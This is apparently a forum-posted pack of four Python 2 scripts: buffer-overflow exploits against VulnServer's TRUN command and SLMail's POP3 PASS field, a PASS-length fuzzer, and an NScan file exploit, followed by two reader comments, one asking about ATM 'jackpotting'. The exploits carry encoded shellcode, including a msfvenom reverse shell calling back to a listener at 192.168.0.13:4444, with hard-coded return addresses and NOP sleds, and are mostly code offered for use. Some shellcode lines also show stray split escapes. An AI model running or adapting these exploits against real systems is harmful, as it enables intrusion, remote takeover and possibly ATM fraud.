# ---------------------------------------------------------------------------
# Python exploit pack -- forum listing holding four independent scripts:
# VulnServer, SLMail, SLMail Fuzzer, NScan.
# All four use Python 2 syntax (`print` statement, `except Exception, e`).
# Every string literal and byte string below is reproduced exactly as it
# appears on the page.
# ---------------------------------------------------------------------------


# === VulnServer ============================================================
# Sends one oversized argument to the `TRUN .` command of the service on
# TCP 9999 at 192.168.0.24. `payload` is laid out, in order, as:
#   2006 x 'A' filler | 4-byte little-endian 0x625011AF | 16 x 0x90 | shellcode
# NOTE(review): the filler length and the packed address are fixed constants;
# presumably they match one specific build of the target in the author's lab
# -- not verifiable from this page.
# Defender view: a command argument of this size made of long 0x41 and 0x90
# runs is a simple pattern for a network signature to match.
#!/usr/bin/python
import socket
import struct

# Opaque payload bytes, built up 12 escape sequences per line. The page gives
# no generator command or size for this buffer.
shellcode = ""
shellcode += "\xb8\xc5\x97\xc9\x70\xdb\xc1\xd9\x74\x24\xf4\ x5b"
shellcode += "\x2b\xc9\xb1\x52\x31\x43\x12\x03\x43\x12\x83\ x06"
shellcode += "\x93\x2b\x85\x74\x74\x29\x66\x84\x85\x4e\xee\ x61"
shellcode += "\xb4\x4e\x94\xe2\xe7\x7e\xde\xa6\x0b\xf4\xb2\ x52"
shellcode += "\x9f\x78\x1b\x55\x28\x36\x7d\x58\xa9\x6b\xbd\ xfb"
shellcode += "\x29\x76\x92\xdb\x10\xb9\xe7\x1a\x54\xa4\x0a\ x4e"
shellcode += "\x0d\xa2\xb9\x7e\x3a\xfe\x01\xf5\x70\xee\x01\ xea"
shellcode += "\xc1\x11\x23\xbd\x5a\x48\xe3\x3c\x8e\xe0\xaa\ x26"
shellcode += "\xd3\xcd\x65\xdd\x27\xb9\x77\x37\x76\x42\xdb\ x76"
shellcode += "\xb6\xb1\x25\xbf\x71\x2a\x50\xc9\x81\xd7\x63\ x0e"
shellcode += "\xfb\x03\xe1\x94\x5b\xc7\x51\x70\x5d\x04\x07\ xf3"
shellcode += "\x51\xe1\x43\x5b\x76\xf4\x80\xd0\x82\x7d\x27\ x36"
shellcode += "\x03\xc5\x0c\x92\x4f\x9d\x2d\x83\x35\x70\x51\ xd3"
shellcode += "\x95\x2d\xf7\x98\x38\x39\x8a\xc3\x54\x8e\xa7\ xfb"
shellcode += "\xa4\x98\xb0\x88\x96\x07\x6b\x06\x9b\xc0\xb5\ xd1"
shellcode += "\xdc\xfa\x02\x4d\x23\x05\x73\x44\xe0\x51\x23\ xfe"
shellcode += "\xc1\xd9\xa8\xfe\xee\x0f\x7e\xae\x40\xe0\x3f\ x1e"
shellcode += "\x21\x50\xa8\x74\xae\x8f\xc8\x77\x64\xb8\x63\ x82"
shellcode += "\xef\x07\xdb\x8c\xe2\xef\x1e\x8c\xe3\x7f\x97\ x6a"
shellcode += "\x71\x90\xfe\x25\xee\x09\x5b\xbd\x8f\xd6\x71\ xb8"
shellcode += "\x90\x5d\x76\x3d\x5e\x96\xf3\x2d\x37\x56\x4e\ x0f"
shellcode += "\x9e\x69\x64\x27\x7c\xfb\xe3\xb7\x0b\xe0\xbb\ xe0"
shellcode += "\x5c\xd6\xb5\x64\x71\x41\x6c\x9a\x88\x17\x57\ x1e"
shellcode += "\x57\xe4\x56\x9f\x1a\x50\x7d\x8f\xe2\x59\x39\ xfb"
shellcode += "\xba\x0f\x97\x55\x7d\xe6\x59\x0f\xd7\x55\x30\ xc7"
shellcode += "\xae\x95\x83\x91\xae\xf3\x75\x7d\x1e\xaa\xc3\ x82"
shellcode += "\xaf\x3a\xc4\xfb\xcd\xda\x2b\xd6\x55\xea\x61\ x7a"
shellcode += "\xff\x63\x2c\xef\xbd\xe9\xcf\xda\x82\x17\x4c\ xee"
shellcode += "\x7a\xec\x4c\x9b\x7f\xa8\xca\x70\xf2\xa1\xbe\ x76"
shellcode += "\xa1\xc2\xea"

# struct.pack("<L", ...) emits the address as 4 bytes, least significant first.
payload = 'A' * 2006 + struct.pack("<L",0x625011AF) + '\x90' * 16 + shellcode

try:
    print "\nSending Random Bytes..."
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # connect() returns None; the name `connect` is never read afterwards.
    connect=s.connect(('192.168.0.24',9999))
    # Read and discard whatever the service sends first.
    s.recv(1024)
    s.send(('TRUN .' + payload + '\r\n'))
    s.recv(1024)
    s.send('EXIT\r\n')
    s.close()
    print "\nExploit Done. Checking..."
except:
    # Bare except: any failure in the block above, not only a refused
    # connection, ends up printing this message.
    print "Could not connect to 9999 for some reason..."


# === SLMail ================================================================
# Logs in to the POP3 service on 192.168.0.26:110 with `USER legit`, then
# sends `PASS` followed by `payload`:
#   2606 x "A" filler | "\x8f\x35\x4a\x5f" | 8 x 0x90 | shellcode
# The 4-byte literal is the address 0x5f4a358f from the author's note below,
# written least significant byte first.
# Defender view: the author's note records the module holding that address as
# ASLR: False, Rebase: False, SafeSEH: False; a hard-coded address like this
# depends on the module loading at the same place every time.
#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Address=5F4A358F Message=0x5f4a358f: '\xff\xe4' | {PAGE_READONLY} [SLMFC.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v6.00.8063.0 (C:\Windows\system32\SLMFC.DLL)
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.13 LPORT=4444 -f python -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
# Payload size: 351 bytes
shellcode = ""
shellcode += "\xd9\xc9\xb8\x2d\xa8\x1e\xe6\xd9\x74\x24\xf4\ x5b"
shellcode += "\x33\xc9\xb1\x52\x31\x43\x17\x03\x43\x17\x83\ xc6"
shellcode += "\x54\xfc\x13\xe4\x4d\x83\xdc\x14\x8e\xe4\x55\ xf1"
shellcode += "\xbf\x24\x01\x72\xef\x94\x41\xd6\x1c\x5e\x07\ xc2"
shellcode += "\x97\x12\x80\xe5\x10\x98\xf6\xc8\xa1\xb1\xcb\ x4b"
shellcode += "\x22\xc8\x1f\xab\x1b\x03\x52\xaa\x5c\x7e\x9f\ xfe"
shellcode += "\x35\xf4\x32\xee\x32\x40\x8f\x85\x09\x44\x97\ x7a"
shellcode += "\xd9\x67\xb6\x2d\x51\x3e\x18\xcc\xb6\x4a\x11\ xd6"
shellcode += "\xdb\x77\xeb\x6d\x2f\x03\xea\xa7\x61\xec\x41\ x86"
shellcode += "\x4d\x1f\x9b\xcf\x6a\xc0\xee\x39\x89\x7d\xe9\ xfe"
shellcode += "\xf3\x59\x7c\xe4\x54\x29\x26\xc0\x65\xfe\xb1\ x83"
shellcode += "\x6a\x4b\xb5\xcb\x6e\x4a\x1a\x60\x8a\xc7\x9d\ xa6"
shellcode += "\x1a\x93\xb9\x62\x46\x47\xa3\x33\x22\x26\xdc\ x23"
shellcode += "\x8d\x97\x78\x28\x20\xc3\xf0\x73\x2d\x20\x39\ x8b"
shellcode += "\xad\x2e\x4a\xf8\x9f\xf1\xe0\x96\x93\x7a\x2f\ x61"
shellcode += "\xd3\x50\x97\xfd\x2a\x5b\xe8\xd4\xe8\x0f\xb8\ x4e"
shellcode += "\xd8\x2f\x53\x8e\xe5\xe5\xf4\xde\x49\x56\xb5\ x8e"
shellcode += "\x29\x06\x5d\xc4\xa5\x79\x7d\xe7\x6f\x12\x14\ x12"
shellcode += "\xf8\xdd\x41\x1c\xf5\xb5\x93\x1c\x14\x1a\x1d\ xfa"
shellcode += "\x7c\xb2\x4b\x55\xe9\x2b\xd6\x2d\x88\xb4\xcc\ x48"
shellcode += "\x8a\x3f\xe3\xad\x45\xc8\x8e\xbd\x32\x38\xc5\ x9f"
shellcode += "\x95\x47\xf3\xb7\x7a\xd5\x98\x47\xf4\xc6\x36\ x10"
shellcode += "\x51\x38\x4f\xf4\x4f\x63\xf9\xea\x8d\xf5\xc2\ xae"
shellcode += "\x49\xc6\xcd\x2f\x1f\x72\xea\x3f\xd9\x7b\xb6\ x6b"
shellcode += "\xb5\x2d\x60\xc5\x73\x84\xc2\xbf\x2d\x7b\x8d\ x57"
shellcode += "\xab\xb7\x0e\x21\xb4\x9d\xf8\xcd\x05\x48\xbd\ xf2"
shellcode += "\xaa\x1c\x49\x8b\xd6\xbc\xb6\x46\x53\xcc\xfc\ xca"
shellcode += "\xf2\x45\x59\x9f\x46\x08\x5a\x4a\x84\x35\xd9\ x7e"
shellcode += "\x75\xc2\xc1\x0b\x70\x8e\x45\xe0\x08\x9f\x23\ x06"
shellcode += "\xbe\xa0\x61"

payload = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode

try:
    print "\nSending random bytes..."
    s.connect(('192.168.0.26', 110))
    # Each reply is stored in `data` but never inspected.
    data = s.recv(1024)
    s.send('USER legit' + '\r\n')
    data = s.recv(1024)
    s.send('PASS ' + payload + '\r\n')
    data = s.recv(1024)
    s.close()
    print "\nExploit Done.. Checking..?"
except:
    # Bare except: every failure above is reported as a connection problem.
    print "Could not connect to POP3 for some reason..."


# === SLMail Fuzzer =========================================================
# Opens a fresh POP3 session to 192.168.0.19:110 for each test string and
# sends it as the PASS argument after `USER test`. The strings are "A" itself
# followed by runs of 100, 300, ... 5900 "A"s (31 entries in total).
# Defender view: repeated logins from one source whose PASS argument grows in
# fixed steps and consists of a single repeated byte are easy to alert on.
#!/usr/bin/python
import socket

# To create array of buffers 1 to 5900 with space of 200.
buffer=["A"]
counter=100
# Stops once the list holds 31 entries.
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter=counter+200

for string in buffer:
    print "Fuzzing PASS with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # connect() returns None; the name `connect` is never read afterwards.
    connect=s.connect(('192.168.0.19',110))
    s.recv(1024)
    s.send('USER test\r\n')
    s.recv(1024)
    s.send('PASS ' + string + '\r\n')
    # No recv() after PASS: QUIT is sent without waiting for a reply.
    s.send('QUIT\r\n')
    s.close()


# === NScan =================================================================
# Unlike the scripts above, nothing is sent over the network: the buffer is
# written to a file on the local disk. `payload` is laid out as:
#   997 x 0x41 filler | 4-byte little-endian 0x7c836a78 | 10 x 0x90 | shellcode
# The author's inline notes give the disassembly of the 18 shellcode bytes;
# the pushed bytes 63 61 6C 63 are the ASCII text "calc".
# NOTE(review): both 0x7c836a78 and 0x77c293c7 are hard-coded absolute
# addresses; the page attributes the first to kernel32.dll and does not say
# what lives at the second.
import struct

junk = '\x41'*997 # 997 bytes
eip = struct.pack("<L",0x7c836a78) # use little-endian to address 0x7c836a78
# call esp
# kernel32.dll
nops = '\x90'*10
shellcode = "\x31\xC9" # xor ecx,ecx
shellcode += "\x51" # push ecx
shellcode += "\x68\x63\x61\x6C\x63" # push 0x636c6163
shellcode += "\x54" # push dword ptr esp
shellcode += "\xB8\xC7\x93\xC2\x77" # mov eax,0x77c293c7
shellcode += "\xFF\xD0" # call eax
payload = junk + eip + nops + shellcode # combine exploit with nop sled and working shellcode

try:
    # The mode string is kept exactly as it appears on the page.
    f = open("C:\\Documents and Settings\\user\\Desktop\\log\\dig\\payload.txt","w b")
    f.write(payload)
    f.close()
    print "\nNScan Saved Return Pointer Overwrite Exploit"
    print "\nExploit written successfully!"
    print "Buffer size: " + str(len(payload)) + "\n"
except Exception, e:
    # Python 2 spelling of `except Exception as e`.
    print "\nError! Exploit could not be generated, error details follow:\n"
    print str(e) + "\n"
You have Vulnserver LTER - SEH? |
hola estimado sirve para jackpot atm? |